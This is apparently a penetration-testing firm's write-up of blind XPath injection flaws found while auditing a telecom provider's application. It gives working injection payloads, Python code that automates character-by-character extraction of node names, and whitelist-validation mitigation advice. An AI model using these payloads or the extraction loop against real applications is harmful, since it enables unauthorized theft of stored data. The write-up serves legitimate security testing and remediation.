During a recent engagement to audit an application for a large telecom provider, Torrid Networks’ application security team encountered several XPath injection flaws. The application also contained many of the common vulnerabilities, including cross-site scripting, iframe injection and information leakage, but the XPath injection made the assignment more interesting: the application stored its data in XML and used XPath to query it.
XPath injection is somewhat harder to identify, and a little harder to exploit, than SQL injection. Automated tools add to the difficulty rather than reducing it, so the team did not rely on them during this test. We followed our application security methodology, which favors manual application security testing over automated testing.
When a single quote (') was passed to the application, it responded in an unusual manner, which made our analysts immediately suspect a typical SQL injection. A quick examination of the exception returned to the browser, which exposed the structure of the XML document, pointed instead to XPath injection.
Having confirmed that injected conditions produced distinct True and False behavior, we injected various queries into the application to extract data.
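The True and False behavior comes from the way user input ends up inside the XPath expression. The sketch below is only an illustration: the application's real query was not published, so the template and the element names in it are assumptions chosen so that the injected condition is evaluated on a child of an address node.

```python
# Hypothetical query template (an assumption, not the audited application's query).
# The user-supplied value is dropped between the two single quotes.
TEMPLATE = "//address/name[text()='{}']"


def build_query(user_input: str) -> str:
    """Build the XPath query by naive string interpolation.

    This is the vulnerable pattern: a single quote in the input closes the
    string literal and the rest of the input becomes part of the expression.
    """
    return TEMPLATE.format(user_input)


# A condition that is always true: every candidate node matches.
true_probe = build_query("x' or '1'='1")
# A condition that is always false: no node matches.
false_probe = build_query("x' and '1'='2")

print(true_probe)
print(false_probe)
```

Note that each payload leaves its last string literal open, because the template supplies the closing quote.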
Detect the XPath version:
We needed to distinguish between XPath version 1 and version 2. To detect which version the application supported, we injected the lower-case() function:
' and lower-case('A')='a
The application returned an error, from which we concluded that it was running version 1, which does not support the lower-case() function.
The XML data is stored as a tree, so extracting it requires node-by-node traversal.
Extract the parent node:
To extract the first letter of the parent node's name, we injected:
' or substring(name(parent::*[position()=1]),1,1)='a
This returned results (i.e. True behavior), which showed that the first letter of the parent node's name was 'a'.
To extract the second letter of the parent node's name, we injected a series of queries:
' or substring(name(parent::*[position()=1]),2,1)='a
' or substring(name(parent::*[position()=1]),2,1)='b
' or substring(name(parent::*[position()=1]),2,1)='c
' or substring(name(parent::*[position()=1]),2,1)='d
The last query returned results (i.e. True), confirming that the second letter was 'd'.
Following the same procedure, we extracted the full name of the parent node, which was found to be ‘address’.
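The letter-by-letter procedure above can be sketched as a simple loop. This is a minimal sketch under stated assumptions: make_payload, extract_name and fake_oracle are hypothetical names, and fake_oracle only imitates the application's True/False behavior locally. In a real test the oracle would send the payload to the application and report whether results came back.

```python
import re
import string


def make_payload(position: int, candidate: str) -> str:
    """Build the injection string that tests one character of the parent node's name."""
    return f"' or substring(name(parent::*[position()=1]),{position},1)='{candidate}"


def extract_name(oracle, max_len=32,
                 alphabet=string.ascii_lowercase + string.digits + "_-."):
    """Recover a node name one character at a time from a True/False oracle."""
    name = ""
    for position in range(1, max_len + 1):
        for candidate in alphabet:
            if oracle(make_payload(position, candidate)):
                name += candidate
                break
        else:
            # No candidate matched: substring() past the end of the name
            # yields an empty string, so the name is complete.
            break
    return name


def fake_oracle(payload: str, secret: str = "address") -> bool:
    """Stand-in for the application (assumption): answers True when the
    tested character matches the hidden node name at that position."""
    match = re.search(r",(\d+),1\)='(.)$", payload)
    position, candidate = int(match.group(1)), match.group(2)
    return secret[position - 1:position] == candidate


print(extract_name(fake_oracle))
```

The candidate alphabet is also an assumption; a node name containing uppercase letters or other characters would need a wider one.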
To count the number of child nodes, the following query was injected:
' and count(/*)=4 and '1'='1
This generated no error, which confirmed that there were 4 child nodes. Here '/*' selects the element nodes directly under the document root, and count() returns how many were selected.
Having established the name of the “address” node, we then cycled through each of its child nodes, extracting all their names and values.
By cycling through every child node of every address node and extracting their values one character at a time, we extracted the entire contents of the XML data store.
After compiling a detailed analysis and proof of concept from the XPath injection and the other security tests, we presented a comprehensive report to the customer. We explained the mitigation techniques to the development team and offered a short technical session on how to avoid such security bugs in future application development, which the team received well.
User input should be checked against a whitelist of acceptable characters, which should ideally include only alphanumeric characters. Characters that may be used to interfere with the XPath query should be blocked, including ( ) = ' [ ] : , * /. Any input that does not match the whitelist should be rejected, not sanitized.
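A minimal sketch of this reject-rather-than-sanitize check is shown below. The function name validate_input is hypothetical, and the whitelist is assumed to be ASCII letters and digits only; a real application may need a different set per field.

```python
import re

# Whitelist: one or more ASCII letters or digits, nothing else (assumption).
ALLOWED = re.compile(r"[A-Za-z0-9]+")


def validate_input(value: str) -> str:
    """Return the value unchanged if it matches the whitelist, otherwise reject it.

    The input is never modified or "cleaned"; anything outside the whitelist
    raises an error so the request can be refused.
    """
    if not ALLOWED.fullmatch(value):
        raise ValueError("input contains characters outside the whitelist")
    return value


print(validate_input("Smith42"))

try:
    validate_input("x' or '1'='1")
except ValueError as exc:
    print("rejected:", exc)
```

Because only alphanumeric characters pass, all of the characters listed above, including the single quote, are refused without having to be enumerated.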
To learn more, feel free to write to us at firstname.lastname@example.org